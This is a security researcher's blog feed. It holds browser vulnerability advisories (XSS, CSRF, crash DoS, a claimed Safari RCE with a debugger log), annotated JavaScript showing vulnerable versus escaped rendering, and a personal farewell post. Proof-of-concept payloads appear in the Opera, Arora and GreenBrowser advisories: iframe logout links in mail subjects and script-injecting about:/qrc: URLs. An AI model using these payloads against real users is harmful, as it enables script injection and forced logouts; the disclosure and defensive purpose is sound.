tag:blogger.com,1999:blog-90115782024-02-06T21:12:58.492-08:00Lostmon BloggerSecurity Research & Analisys:<br>
Personal Blog where I expose my investigations,<br>
advisories and some outstanding news on security.<br>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comBlogger1961999tag:blogger.com,1999:blog-9011578.post-74289584558584616502023-05-09T11:05:00.003-07:002023-05-09T11:10:32.072-07:00That is All <p> Lostmon disappeared a few years ago. My way of working and the excessive hours in front of a computer, coupled with high levels of stress and family problems, have led me to a situation where I feel trapped and unable to escape.</p><p>Everyone must fight their own inner demons when they come to visit.</p><p>Reality is just a point of view, and even when we see reality with our own eyes, it can vary and differ from another observer's perspective.</p><p>This has led me to suffer from a mental illness called bipolar schizoaffective disorder. </p><p>Dealing with my enemy is not easy, and I do not want to feed my demons, but computing, PCs, hardware and software, as well as bugs and other technological worlds, have become a mere anecdote in this daily struggle.</p><p>Thank you to all who supported me and believed in me one day.</p><p>Good luck, peace and harmony to all!</p><p>Curiosity is what makes the mind move...</p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-54923485336274954802022-11-14T08:58:00.005-08:002022-11-18T07:29:12.729-08:00Opera, chrome, Firefox, edge browsers DeadSystemException deeplinks and share links Crash DoS<p> Waiting to disclose details</p><p><br /></p><p>https://bugs.chromium.org/p/chromium/issues/detail?id=1385502</p><p>https://github.com/mozilla-mobile/focus-android/issues/8056</p><p>Related vuln :</p><p>http://lostmon.blogspot.com/2022/10/mozilla-firefox-focus-and-nightly.html</p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-47294620162298679952022-10-12T10:11:00.032-07:002022-11-25T11:26:28.429-08:00Mozilla firefox focus and Nightly for Android remote crash DoS<p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span><span style="background-color: white; color: #4e2800; font-size: 15.84px;">########</span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Mozilla Firefox, Focus and Nightly</span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">for Android Remote Crash DoS</span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Vulnerability.</span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Last update: 25/11/2022</span></span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span><span style="background-color: white; color: #4e2800; font-size: 15.84px;">########</span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;"><br /></span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">Description</span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>A vulnerability exists in the way Mozilla's Android products (Firefox, Focus and Nightly) manage the clipboard and handle exceptions.</p><p>A malicious site can exploit these software exceptions to crash the app, or to deny access to the clipboard and then cause a crash, resulting in the loss of any information that was not saved.</p><p>If we close the app and clear its cache, the situation is the same: a crash, or a DoS that ends in a crash. :)</p><p>The vulnerability interacts with parts of the Android system such as "open links in app" and the sharing functions.</p><p>It is a set of different error conditions that the app cannot handle: the programmer stores remote data in Parcels, or stores data in the clipboard and then processes it.</p><p>Multiple apps are vulnerable to this style of attack, resulting in loss of data, a DoS of the application or of particular functions, a crash of the application, or a dead browser activity that forces the user to close the app.</p><p>We can abuse Parcel errors in</p><p>TransactionTooLargeException</p><p>DeadSystemException</p><p>We can abuse the open-in-app, sharing or clipboard functions in</p><p><br /></p><p>TransactionTooLargeException</p><p>DeadSystemException</p><p>ClipboardManager</p><p>content.ClipboardManager.getPrimaryClip</p><p><br /></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Versions affected:</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Mozilla Firefox</p><p>107.1.0 build #2015915067</p><p>106.1.0 build 2015907747</p><p>105.2.0 build 2015907747</p><p><br /></p><p>Mozilla Nightly</p><p>107.0a1</p><p>build 2015909163</p><p>build 2015909131</p><p>build 2015915115</p><p>108.0a1</p><p>build 2015912339</p><p>build 2015913675</p><p>109.0a1</p><p>build 2015916075</p><p>build 2015917035</p><p>build 2015917803</p><p><br /></p><p>Mozilla Focus</p><p>105.0.2</p><p>build 362762015</p><p>107.1.0</p><p>build 363142253</p><p>#########################</p><p>Related bugs in other apps</p><p>https://bugs.chromium.org/p/chromium/issues/detail?id=1385502</p><p><br /></p><p>Mozilla issue tracker</p><p>https://github.com/mozilla-mobile/focus-android/issues/8056</p><p>Possible related bug</p><p>https://github.com/mozilla-mobile/android-components/issues/12804</p><p>Tested on</p><p>Android 9, 10, 11, 12; testing continues</p><p><br /></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Timeline</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Discovered 28-08-2022</p><p>Vendor notified: NO</p><p>Released 12-10-2022</p><p>Last update 25-11-2022</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">###############</span></p><p>No more details at this time.</p><p>Exploit available privately.</p><p>I will update this advisory in a few days with more information.</p><p><br /></p><p><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">################ €nd ####################</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">--</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Sincerely:</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Lostmon (lostmon@gmail.com)</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, 
FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Web-Blog: http://lostmon.blogspot.com/</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Google group: http://groups.google.com/group/lostmon (new)</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">--</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">La curiosidad es lo que hace mover la mente.... </span></p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-20742820180294639202013-12-14T15:18:00.000-08:002013-12-14T15:25:12.776-08:00Safari for windows 5.1.7 (7534.57.2) Remote code execution############################################<br />
Safari for Windows 5.1.7 (7534.57.2) Remote code execution<br />
JavaScriptCore.dll (7534.57.3.3)<br />
Vendor notify: NO Exploit available: Private<br />
Advisory: http://lostmon.blogspot.com.es/2013/12/safari-for-windows-517-7534572-remote.html<br />
#############################################<br />
<br />
Safari for Windows is a discontinued product, but in my work
(technical support for clients and businesses) I still find it installed on several
machines.<br />
<br />
It is vulnerable to a buffer overflow in JavaScriptCore.dll that results in a remote crash if the exploit fails,
or remote code execution if the exploit succeeds.<br />
<br />
The issue is triggered when Safari tries to allocate a large amount of data on the JavaScript stack.<br />
We expect an "out of memory" alert box, but by fuzzing around that alert it can be bypassed, which leads to the RCE.<br />
<br />
I don't like the responses from Apple, and this is a discontinued product....
See the WinDbg log for this issue:<br />
<pre>(1240.1334): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=77d25085 edx=00000000 esi=1d7c0000 edi=7ff90240
eip=61b39357 esp=0023f01c ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Safari\Apple Application Support\JavaScriptCore.dll -
JavaScriptCore!WTF::fastMalloc+0x157:
61b39357 c705efbeadbb00000000 mov dword ptr ds:[0BBADBEEFh],0 ds:0023:bbadbeef=????????
0:000> !load msec.dll
0:000> !exploitable -m
VERSION:1.6.0.0
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0xffffffffbbadbeef
EXCEPTION_CODE:0xC0000005
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
EXCEPTION_SUBTYPE:WRITE
FAULTING_INSTRUCTION:61b39357 mov dword ptr ds:[0bbadbeefh],0
MAJOR_HASH:0x7fdedd27
MINOR_HASH:0x39b7b969
STACK_DEPTH:6
STACK_FRAME:JavaScriptCore!WTF::fastMalloc+0x157
STACK_FRAME:WebKit!WKDictionaryGetTypeID+0xb112
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x1f776
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x489f2
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x4337e
STACK_FRAME:JavaScriptCore!JSC::JSArray::getOwnPropertySlotByIndex+0x2a44
INSTRUCTION_ADDRESS:0x0000000061b39357
INVOKING_STACK_FRAME:0
DESCRIPTION:User Mode Write AV
SHORT_DESCRIPTION:WriteAV
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - User Mode Write AV starting at JavaScriptCore!WTF::fastMalloc+0x0000000000000157 (Hash=0x7fdedd27.0x39b7b969)
EXPLANATION:User mode write access violations that are not near NULL are exploitable.
0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at JavaScriptCore!WTF::fastMalloc+0x0000000000000157 (Hash=0x7fdedd27.0x39b7b969)
User mode write access violations that are not near NULL are exploitable.
</pre>
Note on the !exploitable verdict: the faulting instruction writes to the fixed address 0xBBADBEEF, which is the marker WebKit's CRASH() macro uses for a deliberate abort (here fastMalloc giving up on a failed allocation). !exploitable rates any non-NULL write address as EXPLOITABLE, so this log on its own shows a controlled abort on memory exhaustion rather than an attacker-controlled write; the RCE claim rests on the private exploit, not on this crash dump.<br />
<br />
####################### €nd ########################## <br />
--<br />
Sincerely:
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--
Curiosity is what makes the mind move.... <div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-76142373878586676022013-08-27T14:59:00.001-07:002013-08-27T15:04:43.108-07:00Opera browser Speed dial Extensions XSS and CSRF########################################<br />
Opera Browser Speed Dial Extensions XSS and XSRF<br />
Original advisory: http://lostmon.blogspot.com.es/2013/08/opera-browser-speed-dial-extensions-xss.html <br />
########################################<br />
<br />
############<br />
Description:<br />
############<br />
<br />
Speed Dial gives you quick access to your favorite Web sites. Every time you open a new tab, you are presented with a 3x3 grid of thumbnails, each representing a Web address. To open a page, click on the corresponding thumbnail, or use the keyboard shortcuts. http://help.opera.com/Mac/10.50/en/speeddial.html<br />
<br />
#########<br />
Abstract<br />
#########<br />
<br />
Developers build extensions for fast access to web services like<br />
Gmail, Flickr or Facebook.<br />
<br />
Speed Dial "protects users" from direct XSS attacks, but the extensions used in Speed Dial are not free of bugs and some of them are not safe. A remote attacker can compose special attacks that abuse the functionality of these extensions in Speed Dial: the extension fetches attacker-controlled data (an e-mail subject, a calendar event title) and inserts it into its own page as HTML.<br />
<br />
<br />
####################<br />
Extensions for Gmail<br />
####################<br />
<br />
These two extensions show the latest unread e-mails from Gmail and are vulnerable to XSS and CSRF-style attacks.<br />
<br />
######<br />
XSS:<br />
######<br />
<br />
If an attacker sends an e-mail whose subject contains HTML code, it is executed in the extension.<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbWL0lAMgS1MQsI-M8IuSRY5YKVZQraWI61hdUxQmhUoHmjo9ho55KZ6KKKftHop5Ree8xkSosFMYYXyaeEq4yX-gPRdMpFMVlr6RdDoh4loA8z1nLc6BZSxm3EUgHyKGFEzi0/s1600/svg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbWL0lAMgS1MQsI-M8IuSRY5YKVZQraWI61hdUxQmhUoHmjo9ho55KZ6KKKftHop5Ree8xkSosFMYYXyaeEq4yX-gPRdMpFMVlr6RdDoh4loA8z1nLc6BZSxm3EUgHyKGFEzi0/s400/svg.png" width="400" /></a><br />
<br />
######<br />
XSRF:<br />
######<br />
<br />
If an attacker composes an e-mail with a subject like <br />
"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe><br />
then when the extension refreshes its content, the victim is logged out.<br />
<br />
<br />
https://addons.opera.com/es/extensions/details/gmail-on-speed-dial-ex/<br />
https://addons.opera.com/es/extensions/details/gmail-on-speed-dial/<br />
<br />
##############################<br />
Extensions for Google Calendar<br />
##############################<br />
<br />
These two extensions show reminders and events from Google Calendar<br />
and are vulnerable to XSS and CSRF-style attacks.<br />
<br />
######<br />
XSS:<br />
######<br />
<br />
If an attacker creates an event in a shared calendar whose title contains HTML code, it is executed in the extension.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBoxZow78isVr3AohNi6HZeeBRNHKt_tYN0QsDGngNyDddeb-HGAtaPemzHZYFSDqHZUlIOA9irto4QLed2fFEv2icqfVtgyKTewE-c08EzavjHU-P9p9XxeUKju-woQOOXA5J/s1600/iframe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBoxZow78isVr3AohNi6HZeeBRNHKt_tYN0QsDGngNyDddeb-HGAtaPemzHZYFSDqHZUlIOA9irto4QLed2fFEv2icqfVtgyKTewE-c08EzavjHU-P9p9XxeUKju-woQOOXA5J/s400/iframe.png" width="400" /></a><br />
<br />
######<br />
XSRF:<br />
######<br />
<br />
If an attacker creates an event in a shared calendar with a title like <br />
"><iframe src="https://www.google.com/calendar/logout"></iframe><br />
then when the extension refreshes its content, the victim is logged out.<br />
<br />
<br />
https://addons.opera.com/es/extensions/details/google-calendar/<br />
https://addons.opera.com/es/extensions/details/gcaltoday/<br />
<br />
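As an added example (this is not code from any of the four extensions named above), the following JavaScript models what a Speed Dial extension does with data fetched from Gmail or Google Calendar: it renders each subject or event title into its own page. The vulnerable renderer concatenates the text into markup; the hardened one escapes every attacker-controlled field for the HTML context it lands in. A small helper then lists the iframe targets in the resulting markup, which is exactly the cross-site GET (the logout CSRF) the victim's browser would send on the next refresh. The sample feed is constructed for the example and carries both payloads from this advisory; run it with `node`.

```javascript
// Added example; not code from the Speed Dial extensions in the advisory.
// Models how such an extension renders fetched data into its own page.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: attacker-controlled text (mail subject / event title)
// is concatenated into markup that ends up in innerHTML.
function renderItemsUnsafe(items) {
  return items.map((it) =>
    `<li class="item" title="${it.title}">${it.title}</li>`).join('');
}

// Hardened pattern: every untrusted field is escaped for the context it lands
// in (a double-quoted attribute and a text node here). In a real extension,
// building the <li> with createElement() and setting textContent is equivalent.
function renderItemsSafe(items) {
  return items.map((it) =>
    `<li class="item" title="${escapeHtml(it.title)}">${escapeHtml(it.title)}</li>`).join('');
}

// The CSRF half of the advisory: every <iframe src> in the rendered markup is
// a cross-site GET the victim's browser sends with its cookies as soon as the
// extension refreshes. Returns those targets so they can be inspected.
function frameTargets(html) {
  const out = [];
  const re = /<iframe\b[^>]*\bsrc="([^"]*)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Constructed sample feed: one benign item plus the two payloads from the advisory.
const sampleFeed = [
  { title: 'Meeting at 10' },
  { title: '"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>' },
  { title: '"><iframe src="https://www.google.com/calendar/logout"></iframe>' },
];
```

With the unsafe renderer each payload lands twice (once inside the title attribute, where `">` closes the tag, and once as the list text), so four logout frames are created; the safe renderer produces none, and the escaped subject is displayed verbatim instead of being parsed.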
################<br />
Related Links<br />
################<br />
<br />
http://lostmon.blogspot.com.es/2010/09/google-chrome-instaled-extensions.html<br />
http://www.osvdb.org/search?search[vuln_title]=lostmon%20extension&search[text_type]=alltext<br />
http://www.oxdef.info/posts/2011/01/18/chrome-ext/<br />
http://www.pcmag.com/article2/0,2817,2359778,00.asp<br />
<br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
-- <br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what makes the mind move....
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-61700107049357003412012-07-31T10:34:00.000-07:002012-07-31T10:34:46.128-07:00Arora qrc: dialog XSS and DoS########################################<br />
Arora qrc: dialog XSS and DoS<br />
Vendor URL: http://code.google.com/p/arora/<br />
Advisory: http://lostmon.blogspot.com.es/2012/07/arora-qrc-dialog-xss-and-dos.html<br />
Vendor notify: NO Exploit available: YES<br />
#######################################<br />
<br />
Arora is a lightweight cross-platform web browser. It's free (as in free speech and free beer). <br />
Arora runs on Linux, embedded Linux, FreeBSD, Mac OS X, Windows, Haiku, and any other platforms <br />
supported by the Qt toolkit.<br />
<br />
Arora uses the QtWebKit port of the fully standards-compliant WebKit layout engine. <br />
It features fast rendering, a powerful JavaScript engine and supports Netscape plugins. <br />
<br />
Arora contains two flaws that allow a remote cross-site scripting (XSS) attack and a DoS. <br />
<br />
The first flaw exists because the application does not validate the URL it reflects into the qrc: dialog and <br />
its internal error pages. This allows an attacker to create a specially crafted link/URL that <br />
executes arbitrary script code in the user's browser within the trust relationship<br />
between the browser and the (local) qrc handler.<br />
<br />
The second flaw allows a denial of service: the application crashes on the same specially crafted link.<br />
<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<br />
Create an HTML document with this code and click the link: the XSS executes, <br />
and when you accept the alert box the app crashes. :)<br />
<html><body><br />
<a href='qrc:/"><script>alert("Sorry, Now Your App Crash!");</script>'>Arora qrc: handler XSS</a><br />
</body></html><br />
<br />
################<br />
Versions affected<br />
################<br />
<br />
<span class="h3">Arora 0.10.0 Windows Qt 4.5.3</span><br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
-- <br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-12271844331944073292012-04-22T23:51:00.000-07:002012-04-22T23:57:02.994-07:00Firefox 11 DoS using exponential string growth and document.write()#############################################<br />
Firefox 11 DoS using exponential string growth and document.write()<br />
Vendor URL: http://www.mozilla.org<br />
Advisory: http://lostmon.blogspot.com.es/2012/04/firefox-11-dos-using-exponential-string.html<br />
Vendor Bugzilla: https://bugzilla.mozilla.org/show_bug.cgi?id=744637<br />
Vendor Notify: YES <br />
##############################################<br />
<br />
Mozilla Firefox for Windows is vulnerable to a denial of service condition. The crash is triggered when loading a malformed page with a malicious script that fills up memory: the script grows a string exponentially and writes it into the document with document.write().<br />
<br />
####################<br />
Versions affected<br />
####################<br />
<br />
Mozilla Firefox 11.0<br />
<br />
##############<br />
Solution<br />
###############<br />
<br />
No solution was available at this time!!<br />
<br />
#############<br />
Proof Of Concept<br />
##############<br />
<br />
See https://bugzilla.mozilla.org/show_bug.cgi?id=744637<br />
<br />
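As an added example that serves both the Safari JavaScriptCore allocation crash above and this Firefox 11 advisory (it is not code from either advisory nor the Bugzilla PoC), the following JavaScript models the allocation pressure both rely on: a string doubled on every iteration, which is 2^n characters after n rounds. What a practitioner wants to see is the behaviour of a hardened engine when a request exceeds what it can allocate: a catchable RangeError rather than an abort deep inside the allocator. The character cap and the sample inputs are assumptions for the example; run it with `node`.

```javascript
// Added example: exponential string growth and the engine's allocation guard.
// Not from the advisories; limitChars is an arbitrary cap chosen for the demo.

// Doubles a string until it reaches limitChars. After n doublings the string
// is 2^n characters (two-byte strings cost twice that in memory), so a page
// can demand gigabytes within roughly 30 iterations.
function growUntil(limitChars) {
  let s = 'A';
  let doublings = 0;
  try {
    while (s.length < limitChars) {
      s += s;            // 1, 2, 4, ..., 2^k characters
      doublings++;
    }
    return { doublings, finalLength: s.length, threw: false };
  } catch (e) {
    // A hardened engine lands here on an oversize allocation (RangeError:
    // Invalid string length). A crash inside fastMalloc, as in the WinDbg
    // log above, means the failure was never turned into an exception.
    return { doublings, finalLength: s.length, threw: e instanceof RangeError };
  }
}

// Asks for a string no engine can represent. V8 rejects the request with a
// RangeError before allocating anything, which is the behaviour to expect
// from a browser instead of an "out of memory" dialog followed by a crash.
function oversizeStringIsRejected() {
  try {
    'A'.repeat(2 ** 31);
    return false;
  } catch (e) {
    return e instanceof RangeError;
  }
}

// Browser-only driver, the document.write() half of the Firefox 11 bug: keeps
// writing the doubled string into the page until the engine refuses. Guarded
// so the file also loads under Node (returns null there).
function writeGrowingDocument(limitChars) {
  if (typeof document === 'undefined') return null;
  let s = 'A';
  let rounds = 0;
  try {
    while (s.length < limitChars) {
      document.write(s);
      s += s;
      rounds++;
    }
  } catch (e) {
    // RangeError: the engine refused the next doubling; the page survives.
  }
  return rounds;
}
```

Under Node, `growUntil(1024)` completes after 10 doublings without throwing, while `oversizeStringIsRejected()` returns true because the oversize request is refused up front; the same code loaded in a browser exercises `document.write()` as well.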
<br />
################ €nd ######################<br />
<br />
-- <br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what makes the mind move....<br />
<br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-72680038727787344112012-03-27T15:16:00.002-07:002012-03-27T15:28:20.868-07:00GreenBrowser About: dialog XSS and stored XSS########################################<br />
GreenBrowser About: dialog XSS and stored XSS<br />
Vendor URL: http://www.morequick.com/<br />
Advisory: http://lostmon.blogspot.com/2012/03/greenbrowser-about-dialog-xss-and.html<br />
Vendor notify: NO Exploit available: YES<br />
#######################################<br />
<br />
GreenBrowser is your best choice of flexible and powerful green web browser.
GreenBrowser is free to download and use.<br />
<br />
GreenBrowser contains two flaws that allow a remote cross-site scripting (XSS) attack.
The first flaw exists because the application does not validate the URL it reflects into the about: dialog.
This allows an attacker to create a specially crafted URL that executes arbitrary
script code in the user's browser within the trust relationship between the browser
and the server.<br />
<br />
The second flaw turns it into a stored XSS: the browser saves the last URL visited, and its default start page
http://www.5igb.com/StartEn.htm lists the last visited URLs. So once a user clicks a crafted link, the XSS
executes again on that page every time the browser is opened, because the page
renders the output of LastVisitWriteEn() to the user without validating the stored URL.<br />
<br />
You can see this function here => http://www.5igb.com/function.js<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<br />
Create an HTML document with this code and click the link: the XSS executes.
Close the browser and open it again: the URL of the PoC is in the last visited pages
and the stored XSS executes.<br />
<br />
<html><body><br />
<a href='about:"><script>alert(1)</script>'>GreenBrowser about: handler XSS</a><br />
</body></html><br />
<br />
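As an added example serving both the Arora qrc: advisory above and this GreenBrowser one (it is not code from either browser, and the allowlist of internal pages is an assumption for illustration), the following JavaScript models the bug they share: an internal "unknown page" dialog that echoes the requested about:/qrc: URL into its own markup, and a start page that echoes persisted last-visited URLs, so the same payload fires again on every launch. The hardened dialog does two things the vulnerable one does not: it only resolves a fixed set of internal pages, and it escapes whatever it echoes back. The two PoC URLs are taken from the advisories; run it with `node`.

```javascript
// Added example; not Arora's or GreenBrowser's code. Generic model of an
// internal dialog/error page that reflects a pseudo-URL, plus a start page
// that re-renders stored history entries.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: the URL is pasted into the markup, so "><script>... breaks out
// of the attribute and the link text alike.
function unknownPageDialogUnsafe(url) {
  return `<p>Cannot open <a href="${url}">${url}</a></p>`;
}

// Hardened: (1) only a fixed set of internal pages is resolvable at all;
// (2) anything echoed back is escaped for the HTML context it lands in.
const INTERNAL_PAGES = new Set(['about:blank', 'about:version', 'qrc:/startpage.html']); // hypothetical allowlist

function resolveInternal(url) {
  return INTERNAL_PAGES.has(url)
    ? { ok: true, page: url }
    : { ok: false, reason: 'unknown internal page' };
}

function unknownPageDialogSafe(url) {
  const r = resolveInternal(url);
  if (r.ok) return `<p>Opening ${escapeHtml(r.page)}</p>`;
  const shown = escapeHtml(url);
  return `<p>Cannot open <a href="${shown}">${shown}</a> (${escapeHtml(r.reason)})</p>`;
}

// Stored variant: URLs persisted in a last-visited list are untrusted input
// every time the start page renders, not only on the first click.
function renderLastVisited(urls, safe) {
  return urls.map((u) => (safe
    ? `<li><a href="${escapeHtml(u)}">${escapeHtml(u)}</a></li>`
    : `<li><a href="${u}">${u}</a></li>`)).join('');
}

// Counts <script> start tags, i.e. payloads that would execute when parsed.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed inputs: the two PoC URLs from the advisories.
const ARORA_POC = 'qrc:/"><script>alert("Sorry, Now Your App Crash!");</script>';
const GREEN_POC = 'about:"><script>alert(1)</script>';
```

The unsafe dialog yields two live script tags per PoC URL (attribute position and link text); the safe one yields none, and the unknown pseudo-URL is refused by the allowlist before any rendering decision is made. The same split applies to the stored list, which is where GreenBrowser's bug becomes persistent.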
################<br />
Versions affected<br />
################<br />
<br />
6.1.0117 (2012-01-17 10:22:02)<br />
6.1.0216 (2012-02-16 21:37:10)<br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
<pre>--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
</pre><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-4495439000466423372012-03-27T10:35:00.001-07:002012-04-03T15:29:08.647-07:00Safari for windows 5.1.5 and prior and IOS URL spoof window.open() test case###########################################<br />
Safari for Windows 5.1.5 and prior URL window.open() spoof<br />
Vendor URL: http://www.apple.com<br />
Advisory: <a href="http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html">http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html</a><br />
Vendor Notify: YES Exploit available: YES<br />
##########################################<br />
<br />
##############<br />
History:<br />
##############<br />
<br />
